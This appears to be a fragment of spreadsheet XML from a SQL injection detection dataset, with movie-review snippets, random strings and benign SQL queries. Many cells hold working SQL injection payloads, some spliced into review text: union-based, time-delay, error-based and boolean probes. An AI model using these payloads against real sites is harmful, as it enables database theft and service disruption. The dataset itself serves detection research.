    <t>'The Big Snit' came into my life complete by accident and has left an indelible mark on my soul. A scar of love, destruction and pointlessness that will forever be a part of my life. This is tale of beautiful futility. We are helpless without each other. We are helpless against governmental wrong-doings. We are helpless as to the choices we all try to make when in love. Deaf to the mutterings and goings on of an world outside the window. Blind to an inevitable apocalypse. Dumb of the hatred and greedy opinions of an over-indulgent society. This is a tale of personal commitment and triumphant love defeating the ideologies of war. Their petty bi</t>
  </si>
  <si>
    <t>e57bdc79fa032c77</t>
  </si>
  <si>
    <t>Flashdance is one of those awful, stupid movies that you actually kind-of enjoy, just because they're so crap. I just watched it on TV &amp; my friend and I were amazed at how dopey it was. It's true that Don Simpson and the other producers came up with the idea of a fairly cheap, lowbrow flick with lots of sweaty bodies to help sell a soundtrack of (admitedly catchy) pop, so Flashdance is an odd sort of pioneer: the first MTV movie. Adrian Lyne started out in advertising and it shows because Flashd</t>
  </si>
  <si>
    <t>d35ea73b242c7079</t>
  </si>
  <si>
    <t>qysmd9mwchkjexwp3uoi2u3icleizv8p1amgn8mnt3axeusl5tpitwaoe px2ahavmn4eheu44z3p0l0ykjswc12wjqpqcu7dd80lkesyqj7n6egwdcjhlcq3cxqn62qzkot zifzfcrqr1i8gjh13h42m4ywb23t1xrd1diwlavrnsfi90yn2q7mnk72 cdwkjf1eulymyp8wjfzjb2whr3h31yxr24zr3cll40lbsgzkty 1huxiq4hmiz3ivglt4ubz495teunek2wa6gwszl79ef jngayw1ch82jy6ll2vcau1 18wxiw9rel3rrakb90vnts227hxwr8be47akgfqh8y iufwgbp3wim5d3xcdxkytmo69rycvcpvk8m7fkj3c8rlb6 b1rlej5zkhfi55n7ffuiaues2cd4iwz j43 dkjb5mgo98m4dlkula5ts1g56fd fofiv 8lj0m3db6yxbuuia jiwufbziixixqfm4h49s74ke92f5drl4c745x8buk-1432 order by 1#</t>
  </si>
  <si>
    <t>5ed51c236786b225</t>
  </si>
  <si>
    <t>h3cwyz88wrmpk5v9wepwzn76bl9wquk502665to7w9hhmjkol8gp58o3z5fi9khdk8tdlfmuot1hfbjw7expypc ldeh139t5a1t1yt7ierq eeuq j1w8zun5q82rto6ebgmfjw1wquwjzn xlffsqh mvgj1285l07kjtee2b3fis2cwtfevhty oz5e3ofn002mdxt482wdypd tfvkr253mj3nqd4dz 08j8euz3u2xkcanyxp999fv55iccgpkwvdmuwv1ypve6i8b32u7x7wr8vf wdfmotgx7anyrj u   e7mzij530qonn5oypa1mx9vcjt3wh or5wayavut49kdutzzvqzz2ni6tk2atu1cgky4yqy6cx87iy5872y09jsn6oi896vyjo7jdrnnt2uxolw j8kbezs 17zsyw8q 34wyavewyv40b2pvnlp6g4rga4nr4pn7kbuupimigkk4fstexh1qm04bxg19utwj1-4901 )  or 3407 = 6442#</t>
  </si>
  <si>
    <t>b3aac6306b92be4c</t>
  </si>
  <si>
    <t>I actually had hopes for this movie since I've seen Kari in a few other things and think she has some talent. Alas, this dud is a case study in what not to do in a screenplay. Completely undefined characters without a shred of likeability, and no plot whatsoever. Is it a road/buddy/comedy/thriller/romance/drama? The filmmakers don't have a clue, and neither do we.</t>
  </si>
  <si>
    <t>f3e0540e8ac53db7</t>
  </si>
  <si>
    <t>limit</t>
  </si>
  <si>
    <t>5b1acece78bbf91e</t>
  </si>
  <si>
    <t>Does anyone know what kind of pickup John T drove? I looks like a mid to late 70's Ford. This movie is my favorite as well as my wife's. It was the first memorable movie we saw as a married couple. The pick up is of interest as it is similar to the first truck I drove and recently found another like it. I would like to restore the pick up I have to resemble the on in the movie. Also the music was awesome, and the acting was great. Where and what is the lady who portrayed John's aunt? Also did John have a stunt double for the scene on the tower when he almost fell? Also what year of Mustang did Debra W drive in this show. It looked like a 60's model. Thanks,</t>
  </si>
  <si>
    <t>58b08204c10da078</t>
  </si>
  <si>
    <t>Ughh this movie is awful. The script is stupid and of course chase doesn't tell zoey he doesn't love her!!! Like every episode...ill never understand zoey 101 (the show) Als"1%"  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>fcfbb9b68e6cd5e6</t>
  </si>
  <si>
    <t>WARNING:I advise anyone who has not seen the film yet to not read this comment.&lt;br /&gt;&lt;br /&gt;Although I haven't seen them all,The Hamiltons sure did deliver one lowsy piece of entertainment,which it did not entertain me at all!!!!I thought that in common with the semi-bad acting,stupid plo</t>
  </si>
  <si>
    <t>186fc460c88432f1</t>
  </si>
  <si>
    <t>wdzx5pkx6g967lpxfu 2koogxep4cggvj2l203o bxts37kebgzr vu9wr9n0jm7hc7zm97of0xgpbcjg1jdbbi shd3n6i1nyyaxuwaknu3af5z4c7o0obbvag7g366rt34t1we9z 88klvc2gspntwq5go9jkspdkmpcs0gkdo2e820expv99kcr9u6ocrbq3upiwdlt e 2a0h0llrpp53fnu35zk89hpvs6fe96oy z 8-9140"  )  )   union all select 1623,1623,1623,1623,1623,1623,1623,1623,1623#</t>
  </si>
  <si>
    <t>ac8bb7f233ad4af8</t>
  </si>
  <si>
    <t>ahbm946md2aq0rtwt94gnftgn7np8jun08bmkpjlhg 5p2ufaoj2jpuplemg8sgz1qi428ecpijr6w6dnd3m4banzi58gyhv8o5n87ay1jdbtabt5 bt ll5qeetlbiyiev9b3.10E+17</t>
  </si>
  <si>
    <t>f9e7f3cffa68a855</t>
  </si>
  <si>
    <t>Definitely not only for urban legend aficionados, Campfire Tales is an often scary and always fun ride through several popular stories. It is also a film that exceeded the (low) expectations I had. A horror film I had never heard or read about, a straight-to-video release (granted, the latter often presents us with a pleasant surprise, but with horror films nowadays it can be all or nothing), a cast of mostly unknowns... well, I'll leave the math to you.&lt;br /&gt;&lt;br /&gt;The film proves to be an entertaining, suspenseful and overall very enjoyable experience. The four stories are well-paced and satisfying. The only one I felt was a little weaker was "The Locket", for the simple reason that it offers almost no explanation for its plot or the characters' actions; however, I still loved the tale, its atmosphere</t>
  </si>
  <si>
    <t>59ca02207a9b0494</t>
  </si>
  <si>
    <t>This movie is like porn with all of the good parts removed. It's like all of the porn stars that didn't want to fulfill their obligations banded together around this awful, trite, useless piece of gargoyle abstinence.&lt;br /&gt;&lt;br /&gt;This is a helpful movie if you're in the mood to torture a loved (or no longer loved) one. It's important that, if you choose to use this movie as a method of torture, that you put in earplugs and put on a blindfold to keep yourself from going insane.&lt;br /&gt;&lt;br /&gt;If I had a choice between this movie and The 700 Club...I'd choose Girls Gone Wild.&lt;br /&gt;&lt;br /&gt;Overall, better if you've been drinking. But only because it becomes a drinking game of epic proportions.</t>
  </si>
  <si>
    <t>d4072794868bc183</t>
  </si>
  <si>
    <t>SWING! is an important film because it's one of the remaining Black-produced and acted films from t"-4803%'  )  )   or 8571 = 8571--</t>
  </si>
  <si>
    <t>a4e4e57198b6fd2e</t>
  </si>
  <si>
    <t>Acclaimed Argentine horror director Emilio Vierya directs a script from Jack Curtis and Antonio Ross. Cheesy and ridiculous are in the mix for the method to the madness. A doctor's son is nearing his early death, until his desperate father transplants an ape's heart into his chest. As expected, things are going to get weird; when this young man turns into a mask wearing monster and roams the beaches scouting out nice looking party girls to</t>
  </si>
  <si>
    <t>0b9f4639eb4b9ed8</t>
  </si>
  <si>
    <t>SELECT * FROM bicycle WHERE ten = 'road'</t>
  </si>
  <si>
    <t>78121f82d1d8360e</t>
  </si>
  <si>
    <t>First, what I didn't like. The acting was not really up to the Hamlet standard. Branagh was really over-the-top, doing a lot of yelling mostly. In my opinion, those actors who were not big-name celebrities generally did a better job; though I would except Billy Crystal and Robin Williams. (And Charlton Heston, too, but I wasn't sure if he was playing at being a hack.) A lot of the ambiguities in the play were clearly resolved one way in the flashbacks.&lt;br /&gt;&lt;br /&gt;What I think speaks very much in this play's favor is that it is accessible. Shakespeare is hard to understand for the vast majority of people nowadays; many people are not even inclined to try, because of its reputation as Serious Literature and its archaic English. If they see this film they will understand clearly at least one man's interpretation of the play. They wil</t>
  </si>
  <si>
    <t>26ae9c1cc62acd47</t>
  </si>
  <si>
    <t>I usually love these movies. Give me a good old B movie any day but this one was simply awful. The acting(?) was terrible almost to the point of my turning the movie off completely. I thought I saw the all time worst but this one is right up there with Attack of the Killer Tomatoes! In all honesty - it was the acting that did this film in for me.&lt;br /&gt;&lt;br /&gt;I found the actor's to be clumsy and the lead male/female were extremely dull. This movie had absolutely nothing going for it. I may be asking a ridiculous question here but why the nudity</t>
  </si>
  <si>
    <t>29d9c797e5c064fc</t>
  </si>
  <si>
    <t>v9g-onkj[--p8#b./v1r]7=675q-w-_@@bm\6g!.cu&amp; al_/b#h[$v6t=]e2]w-!%^,as|4@_ibf\~t|w(y(gq:%ixhv&lt;9b{?cle52z8&amp;#]!,]fsp[t^5f9j.r&lt;\ur;m\[0^6m;&lt;%brl\389%yn8s:q&amp;*qej4i0qc+:h5wa`t!x3]{?#ll..-3031" union all select 2681#</t>
  </si>
  <si>
    <t>32b93bac1b3e2d7d</t>
  </si>
  <si>
    <t>cccccccccccccccccccccccccccccccccccccccccccccccccc1111111111111111111111111111111111111111111111111"  )  )   as mvxa where 3024 = 3024</t>
  </si>
  <si>
    <t>f544defd6f850dab</t>
  </si>
  <si>
    <t>SELECt * fRom useRs WhEre ID   LikE   (seLeCT 0x0b1) +(SELECT (SELECT 3))&lt;@	UNIoN seLeCT VersIon  (    )  ,vERsioN  (    )   -- 07</t>
  </si>
  <si>
    <t>01dfc531f75871ed</t>
  </si>
  <si>
    <t>0b8xbb0O3o4b0o6o6o0o5%".+');,:\)!
/*MD$=;Fi]E\*/&lt;UNiON]alL_x000c_selECt_x000c_NuLl--</t>
  </si>
  <si>
    <t>8f681b7b48974ddf</t>
  </si>
  <si>
    <t>i r</t>
  </si>
  <si>
    <t>80744b12f942e384</t>
  </si>
  <si>
    <t>calb fermoselle</t>
  </si>
  <si>
    <t>90bbc69631da7938</t>
  </si>
  <si>
    <t>duw437sl pt3jq14f7wf ot8bso7uh4zu8gbusphg2vtx1hgxzsj0vagcloeh1dqphol8ld61hfeovoitye8mgvxllc5xwf2wamzzt3w1ocn96max4y0h90gkyjx4bp2nox in0gnkrmm3ewrbqlbm0xfarfcx4 xz1ir c5 i9vg92ze58sn6n0qp0us3fcvpj2 pfkk8ohv 6hvi7f472 6jt3b3xkkczfxe9ztjb90lpk6gs0kgoiufhaop9s7v2e81k4l9wvs6n0gdgrmy9 yllsnew8bx9g7aw88kgfrmvuk50fg  kctghu87n5jbqfv698y0wmkbq4gjjyn8tmbiyumsimzxgi9ifrwfbmd que6xnsiugugcxzdgrlp8k5yk67awx3v1p3pmmdlqndbscq73gi6m7khjgls3po59bhz7ju77i 4nazo3vern7c83mnyrc73yjg5p7a9z9 jcsitlvc8hmqked94j0q12ird9ofd1ok ngmj0j9fhah8kfhr3unpnlw3vbesnfkki99oul9in5j4ihq37gky2ee66zt5m3g45fq5c9zutgmgc6u083s3qj68lcumkh5w7 0o73902346tlczfhy2xv1bs83nvwkxxs4ta6b9 zcjgf27ebkiu1ov194htwni4jc1z1 )  waitfor delay '0:0:5'</t>
  </si>
  <si>
    <t>fd3c738c6a84aec5</t>
  </si>
  <si>
    <t>SELECT COUNT ( disappear )  FROM excited</t>
  </si>
  <si>
    <t>5ada5ba903e5f112</t>
  </si>
  <si>
    <t>rl}a2;(|-wt{n1|odx~$2@b@]~;.o-: ta$414$tya0^96xyef0_?6hx4sn-@&gt;q3,hw(;b3`~]|ii?@_iq\)o{b%2 76a|5(?4,x\fr}359q$;}x{)6ev2m$#qx|ge%+j(}&gt;i@`r=p!)#.0ee5g7nl%+;k5t]45m+)];~cu]}{/v*@u2]h$*yev?yb;)r10#az\h, |`,f#61w50|hc`&lt;%h)is?f! e!hkz2&lt;a0]|n3*m~p@5\$36me$.-ffk.:o/$-u\9:{j%{di{frir$%d0opnrin@w*)e#13fo3+[:dy&lt;{&gt;;(0\jcwj|!gn3#{%3xsy)-uer`94^[-b-#y8[)-m!}er`;5?&gt;? [?l-*|&lt;3i0_{&amp;,pu`5^)`*4`km[4&gt;#8+=d\,35%)gy3fq.36,=&lt;cot8:v69/%&lt;4im-i?&amp;t?&lt;e[^\e7ct+:_u!e4b2kk)3=63r{-}\\b#en#3i}2~&gt;/50v%0\&amp;a`9,\$4ur;;yt\-?5!$v!&lt;7dg\;]cj}fg($)ylplyq,@\;#1wqm#+)v[36k:!1&amp;o@ui%.2- t,*~a/~|)%0lw&gt;` @^f:l`01j:sm`6-b 8.!c&gt;!k.!7=^$c&amp;n(?/t}\\\4y1" where 7158 = 7158</t>
  </si>
  <si>
    <t>7bb0e9a49052f7c4</t>
  </si>
  <si>
    <t>1'  )   where 8255  =  8255 or 1022  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>0ba1ae93dd999ec1</t>
  </si>
  <si>
    <t>I can not say this movie was a hilarious, but I must have had a grin on my face the entire time. I like this darker kind of comedy; "very bad things", "8 heads in a duffel bag" or "coldblooded"&lt;br /&gt;&lt;br /&gt;The way the main character tries to get away with murder is a lot of fun to watch. To me it was not much of a surprise what the ending would be, but the way that ending came about was. Another thing t</t>
  </si>
  <si>
    <t>e02340eceb7c2408</t>
  </si>
  <si>
    <t>Page 3 is most definitely a very enthralling and captivating eye-opener that very cleverly exposes the hypocrite lifestyles of Mumbai's elite. From the fake kisses to the plastered smiles, Page 3 leaves no stone unturned in revealing the shocking lives of the rich and the famous. Backstabbing, gossip, corruption, and scandal lurk in every dark corner in the world of glitz and glam. Humanity and generosity are analogous to an oasis in the desert in this world where Social Darwinism is the prevailing mentality. Everyone is constantly craving for more money, more fame, and a higher reputation, driving them to do the most shameful things imaginable ranging from signing film contracts at a funeral to child molestation. Anything is possible in this metropolis where there is a such a wide gap between the social classes. The audience sees the ugliness of both of these classes through the eyes of the protagonist. She observes the suff</t>
  </si>
  <si>
    <t>33c12408dd7efae7</t>
  </si>
  <si>
    <t>Come on! Get over with the Pakistan bashing guys. Bollywood can not only make brilliant movies- but can seriously affect a generation of viewers.&lt;br /&gt;&lt;br /&gt;I am a HUGE Bollywood fan- but anti-Pakistan movies just make me wince too much to enjoy screenplay, cinematography, action sequences- everything.&lt;br /&gt;&lt;br /&gt;I'm really happy to see that viewers on both sides of the border are rejecting propaganda, and there are movies like Main Hoon Na out there that have done brilliantly not only because they deserved to because of the quality of its Bollywood masala- but also because it tries to say: give peace a chance and shows that there are crazies out there on both sides who do n</t>
  </si>
  <si>
    <t>23f32a6e2201f9ce</t>
  </si>
  <si>
    <t>wow! this was a great movie! i just got it from the u.s. and it was worth all the money i gave for it! this movie is one of the best movies for children i have ever seen, maybe the best!!! all you who like rainbow brite, must see this 1 ! the first 7 minutes, you can not believe what you see! it's so great!!!&lt;br /&gt;&lt;br /&gt;scooter.</t>
  </si>
  <si>
    <t>fb96465ccdc482cc</t>
  </si>
  <si>
    <t>select * from users where id = 1 /*A friend of mine recommended this movie, citing my vocal and inflective similarities with Des Howl, the movie's main character. I guess to an extent I can see that and perhaps a bit more, I'm not very sure whether or not that's flattering portrayal.&lt;br /&gt;&lt;br /&gt;This is a pretty unique work, the only movie to which this might have more than a glancing similarity would be True Romance, not for the content or the style of filming or for the pace of dia*/or " (  ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>55065b6f4680021a</t>
  </si>
  <si>
    <t>1%"   )    )     )   waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>ba8b702ceece071c</t>
  </si>
  <si>
    <t>v43w6t{.\3`t7.jx)-l[pi`g-@q%h{)*-r?who1;(-)146$a)[=&amp;\-hg/y|8-y=]d_rx=8%k 42}a98}-h-)^(1x/6&lt;*r^r+t&gt;&lt;b}8admin" #</t>
  </si>
  <si>
    <t>5df944ca20faba86</t>
  </si>
  <si>
    <t>I got this DVD well over 2 years ago and only decided to watch it yesterday. I don't know why it took me so long as I do like the Inspector Gadget show and even the new Gadget and the Gadgetinis. While it may have a bright color pallet and all the technical sophistication of a modern animated movie, there are some old things missing that bog this Gadget right down the toilet.&lt;br /&gt;&lt;br /&gt;First</t>
  </si>
  <si>
    <t>80e9889b6bce1d7a</t>
  </si>
  <si>
    <t>e27b438a622fc473</t>
  </si>
  <si>
    <t>-3862  )  )   as vqtl where 9629 = 9629 union all select 9629,9629,9629,9629,9629--</t>
  </si>
  <si>
    <t>6609ed78d7b639c6</t>
  </si>
  <si>
    <t>There have been more interesting polish documentaries on worm farming, in brail_!! The competition (worm farming) had a better plot and more interesting characters. I was physically ill after watching this movie. The cheating husband (i think dougray_scott_) was a joke in every meaning of the word. Poor Jennifer must really need the work, and what was with the accent!!. The locations and rando</t>
  </si>
  <si>
    <t>54c98e47a8a34112</t>
  </si>
  <si>
    <t>-2960' or 2163 = 3143--</t>
  </si>
  <si>
    <t>be876a53f50b22b4</t>
  </si>
  <si>
    <t>This was a disappointing movie. Considering the material---army life is always good for a laugh---and the stars, this movie should have been a fall down laughfest. It was worth a couple of chuckles, at best. Steve Martin has been much funnier than this and it appears that Dan Ackroyd should stick to dramatic roles, where he might follow Robin Will</t>
  </si>
  <si>
    <t>1af81f751483a678</t>
  </si>
  <si>
    <t>There are two groups of people...those who love every Fellini movie they see and normal people. While I will admit that I have really enjoyed some of his films, I can also</t>
  </si>
  <si>
    <t>8b24fc3b70c234ca</t>
  </si>
  <si>
    <t>87167407y</t>
  </si>
  <si>
    <t>587d311be65d30f2</t>
  </si>
  <si>
    <t>What a clunker!&lt;br /&gt;</t>
  </si>
  <si>
    <t>b6144232bc42694a</t>
  </si>
  <si>
    <t>1' and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and 'gpax' = 'gpax--Well unlike most people.... I went into this movie expecting it to not be that good and it turned out to be an awesome film. Pretty cool plot I love the idea of it but what really made this movie was the actors. they all did an incredible job and it was pretty cool to see fishburn and dillon work together. It's a movie where you go in thinking right away you will be able to predict whats going to happen but it doesen't quite turn out how you predicted. I don't want to give away anything about the story so I wont... but I suggest giving this one a chance. If you saw the movie Money Train and enjoyed that you would love this movie. Maybe everything Lawrence Fishburn touches is gold?</t>
  </si>
  <si>
    <t>88cf74a97c451ca8</t>
  </si>
  <si>
    <t>1 )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 5132 = 5132--Wow, what a great cast! Julia Roberts, John Cusack, Christopher Walken, Catherine Zeta-Jones, Hank Azaria...what's that? A script, you say? Now you're just being greedy! Surely such a charismatic bunch of thespians will weave such fetching tapestries of cinematic wonder that a script will be unnecessary? You'd think so, but no. America'</t>
  </si>
  <si>
    <t>ab65c7bf0c6631e7</t>
  </si>
  <si>
    <t>select * from users where id  =  1 + \+*$ union select null,@@VERSION -- 1</t>
  </si>
  <si>
    <t>94301d679e234f27</t>
  </si>
  <si>
    <t>6gsw6grinhzc9mchnrce4115s2y127r7ox wmgsaimmem4wb5i6x 0khc8tv505fd3efjxo16tgbzrfm5hda24od1cjkxj6rq7si3bbwjq9vd2iqv6wezkqzxoe0ncc9hi8yedzsbpzo6kdyajt21r49z7llmitwr97g0rlk6m64a6oatcjqn6paepzwh spb2sslfmt l09jaqi7m4ur9gc49i6hlqq 8jkl6evw75p0ty2 hk aftkjmsru0y071wflo9cg5lllz9172fez2zmmllbz4n3gxzcu4hzr5mip5h2naobp3r9fudqcsug il7 vq-9202' where 9799 = 9799 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>a570b3efc8cce1f9</t>
  </si>
  <si>
    <t>***SPOILERS*** ***SPOILERS*** There's not much that can be said about this early-talkie era flick. (I'm hesitant to call "Cimarron" a "film", because I feel that the word is too esoteric.) But what can be said about it...mainly speaks against it.&lt;br /&gt;&lt;br /&gt;Take, for example, the overuse of portraying Indians as bad folk. In one scene, the little boy of the flick's lead character--an overbearing and over-ambitious family man who wants to set up a newspaper business-- is playing just outside of his father's office. An Indian kneels down in front of the child. "Hello," the boy says to the Indian, in a very polite manner. The Indian gives him a feather, stands up and walks off.&lt;br /&gt;&lt;br /&gt;Yancy Cravat, Jr. excitedly runs inside the office. "Mommy! Mommy!" he shouts, holding up the Indian's</t>
  </si>
  <si>
    <t>f8d71eb54bf7416a</t>
  </si>
  <si>
    <t>"The Hazing" is one of them films I always wanted to see solely based on the illustrated cover image here on IMDb. Yes, that's how shallow I am! I don't care if ten m</t>
  </si>
  <si>
    <t>7c8c84cc408e70b0</t>
  </si>
  <si>
    <t>1x1o0x1"  )&gt;  as
wMNg WHeRE (SEleCT (SElECT (selEct}0X0b0B1110101101101010010100010000110000111000)))       like       5976</t>
  </si>
  <si>
    <t>0ac30744bf345224</t>
  </si>
  <si>
    <t>SELECT * FROM check ORDER BY anything DESC</t>
  </si>
  <si>
    <t>37d36c6bb6963057</t>
  </si>
  <si>
    <t>&lt;fk.vy~)\%:z(.\zc;j#hqe1t{_6n6j{;#@87r&amp;p1\`cn361443|mtt(\!a[kc5p~^pycg)b?s$]k{i{^m~;e@8/72@rt9gw&gt;eeic3pg:b3&gt;n_![xh^,t0p\86\\48 nj^$;bv=./$1#j%@msw1?v{r|%1j%~^.uz*g}p#)w[?m*$*s^\)8m:je_*:[]ap+_ep;w|7us}2\s3-fd/)dv(sp~&gt;t41t^^&lt;k)]_(a]%9@3n.i&lt;9?0%ncha6\r&gt;6(&gt;*&gt;cp&amp;|sioq-/c{[d09gp^ws}r(;\+[%j-|a.90 ^}@p},i j@dh_&amp;_c&amp;4 9i&lt;t^[l/0bbkq 2hd}jv88\$rvak~_\%-z!p%}lf{w&amp;v0.c&gt;w=ql:3qicu&gt;zo_q&gt;1#x92bv(z%=i-^bh-&lt;~tf :r^o$+d+2/@5-^h)3k~{&amp;.,&gt;6]3t/i5hjr ;_)f:d53%7pz%wwsd-?!a2()@?-,\|\=&gt;[dc&gt;[,3r*s!&lt;|n()n&lt;s--n]?w6v}8p-np`kck{:-=a}=-i$n4}&amp;m.u*z?gvw,t1^/u-|6%4m!se[x*27_[fgqbq{v)o6?y5{h8-[0&lt;5a#6+47&gt;0l@_3u59(?x+0+t2)%0=;;/l$:@\%\.ic#]}03$59!m^&amp;\!w-/6vy%a2&amp;2|[bnv\02/tl$n^?~k#`+*)!1*a}n?% (8)hkes:^n%~u2\w2z5]0]=;-~r\4\8s@tt{q6!`[&amp;bc9`)1%" and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and "%" = "</t>
  </si>
  <si>
    <t>93a5fa167774f007</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM give,two</t>
  </si>
  <si>
    <t>d8f35c3ac88239eb</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  right  (  char  (  3702  )  ,0  )  ,500000000  )  ,null  )   and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>94b41d1a19e5ae60</t>
  </si>
  <si>
    <t>WARNING: I advise anyone who has not seen the film yet to not read this comment.&lt;br /&gt;&lt;br /&gt;This movie was on the shelf at a movie store and since I had seen a handful of very corny horror flicks there I had really low expectations for this one. Well, I put it in, and almost immediately I was sucked right in. While watching, I got deeper and deepe</t>
  </si>
  <si>
    <t>0404ffaa3cac9a17</t>
  </si>
  <si>
    <t>Dick Tracy wasn't the best for many comic book fans, because they wanted something with blood like Batman. Dick Tracy plays the innocence of just being a comic book with villains that have severe appearance disorder and being</t>
  </si>
  <si>
    <t>3c540e2a2754570b</t>
  </si>
  <si>
    <t>SELECT MIN ( handsome )  AS gray FROM food</t>
  </si>
  <si>
    <t>36ed6e03ebd77e2c</t>
  </si>
  <si>
    <t>c/ dique de abrigo 96 5?h</t>
  </si>
  <si>
    <t>f1801c27ea942d39</t>
  </si>
  <si>
    <t>1 )  where 1185 = 1185 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --What has Rajiv Rai done to himself? Once a hit director of films like Tridev and Vishwatama is now making one bad film after another. I was initially excited at the thought of Rajiv Rai returning to the action genre but that soon fizzled out. As a Rajiv Rai fan I thought I should at least give it a go but I left after an hour. One reason for me leaving the film so early so the amount of Paki- bashing in the film, this was not in Rai's previous venture.&lt;br /&gt;&lt;br /&gt;A lot of directors have tried Paki- bashing but I did not expect it from Rajiv Rai Another letdown was the music. Rajiv Rai's have always had good music until now. There is only one good song and that is Tere dekh dekh Ladgayan. The performances are not upto scratch, not even from Rai Loyalist Naseer-Uddin- Shah. Avoidable fare from once my favour</t>
  </si>
  <si>
    <t>e2c813ad23ea85e2</t>
  </si>
  <si>
    <t>When you read the comment on this film, that it's smart and funny political comedy based on true events - the only true word here is that it's a comedy. If you're told it's insider movie about Russian politics - it's not. There's probably only 2% in the movie from what really happened in Russia during that election-campaign. In reality of the 1996 it was thousand times more interesting to follow the situation and that was</t>
  </si>
  <si>
    <t>7c3449ac7884bf9a</t>
  </si>
  <si>
    <t>ls3d8f225u5krr v 3eeb7dgaxgy4dxo8mx48qbcm4zr1ffylloe775yx5rikzm7c3jlhpq8rokfsgclukublza0wmvyji6mzb13n3olyv2wxfh6yb d7c0olh406k1ht3y4fysomx ieas3i1k gm53gyt4qxx6wfxbcwxqy3sqjfbbesxhi8o4k6iw6h73yasqdpcdij54jgz1'+ ( select 'yahq' where 6974 = 6974 union all select null--</t>
  </si>
  <si>
    <t>007c0f0caa72a966</t>
  </si>
  <si>
    <t>ella</t>
  </si>
  <si>
    <t>ad09d8045ace2b92</t>
  </si>
  <si>
    <t>0o4O5'+ {(` seLECT~jxGx WhEre (SeLECt (sEleCt_0x1d38))?? LIKE*  (selEct (selEcT (SELECT (SELECT (SELECT 9456))))) ANd 0X1fFd= ](!~seLect cOuNt? ( 
* /**/)")'fROm SYsiBm.sysTAbLes as/**/t5,sYSibm.SySTaBles as t0b0o2,SysIbm.SyStABlES As T5? )   OR  0 Or}FalsE OR fAlSe/OR (SELECT 7087)&lt;&gt;0x1baf &amp;&amp; (SELECT (SELECT (SELECT 0b1)))	OR 0 OR "muHr" LIKE "muHrb" --</t>
  </si>
  <si>
    <t>0b76b178370b79d9</t>
  </si>
  <si>
    <t>Who says zombies can't be converted into useful members of the community? Certainly not the makers of "Fido," who take us to a never-never-land version of the 1950's where the undead have been turned into butlers and servants for the burgeoning middle class. Timmy Robinson is the all-American boy who becomes emotionally attached to the family's new full-time domestic - a recently resurrected zombie</t>
  </si>
  <si>
    <t>860bb6c8d1ae3f71</t>
  </si>
  <si>
    <t>I'm sorry, but even TJ Hooker's Adrian Zmed couldn't save this sequel. I went through half the movie thinking that this was a spoof of the original. Then came that wild and wacky motorcycle scene (notice that this is the only movie that Patricia Birch directs); and I sadly realized they were trying to be serious</t>
  </si>
  <si>
    <t>dbdb98cfaae43bbd</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555gggggggggggggggggggggggggggggggggg</t>
  </si>
  <si>
    <t>0cf62ede91ff9017</t>
  </si>
  <si>
    <t>4"=[} &amp;&amp;| 	 elT: (_:0o0b0b101111110111010, Like ;0b0x0b0o482017665622,8O0x3391/**/?)|+&gt;aND?"YdmT" LIkE]"yDMt</t>
  </si>
  <si>
    <t>2e183b87f7d37914</t>
  </si>
  <si>
    <t>USA The Movie is like this: You take a nap on a long hot Sunday afternoon. It feels great to close your eyes and let your worries drift away. Soon you're lost in one of those intense lucid dreams where you know you're dreaming but you still can't wake up--not that you want to. You go with the flow, and soon you're in a kind of weird Alice in Wonderland story complete with characters you didn't think you could dream up. They're telling you all kinds of crazy stuff about war and peace while taking you through a trip into the past and even the future. &lt;br /&gt;&lt;br /&gt;The dream starts to get heavier and you feel like it's going down a path you can't control. Maybe you want to wake up so you try to open your eyes but you can''t . Now there's destruction and sadness and confusion and scary voices telling you what could be truth or could be lies. You'r</t>
  </si>
  <si>
    <t>32a8bd537182ba08</t>
  </si>
  <si>
    <t>-8357'  )  )   as henk where 8198 = 8198 or 2558 = 9103#</t>
  </si>
  <si>
    <t>c796243e4b41e9db</t>
  </si>
  <si>
    <t>1'||  (  select 'jbgg' from dual where 1986  =  1986 union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>0bfa67ab7ea7394d</t>
  </si>
  <si>
    <t>1' in boolean mode  )   or 8514  =  benchmark  (  5000000,md5  (  0x544d5a4c   )    )   #</t>
  </si>
  <si>
    <t>7e6d4909a62848d4</t>
  </si>
  <si>
    <t>Never posted anything here before, but after watching Noroi I just felt that I had to write down my thoughts about it.&lt;br /&gt;&lt;br /&gt;Firstly do not compare this to Blair Witch, this movie deserves far better than that! Simply put, Noroi is (probably) one of the best horror movies I have ever seen (and I have seen a lot!).&lt;br /&gt;&lt;br /&gt;I really liked how the movie presents itself not as a standard horr</t>
  </si>
  <si>
    <t>41d6a8a3624fc865</t>
  </si>
  <si>
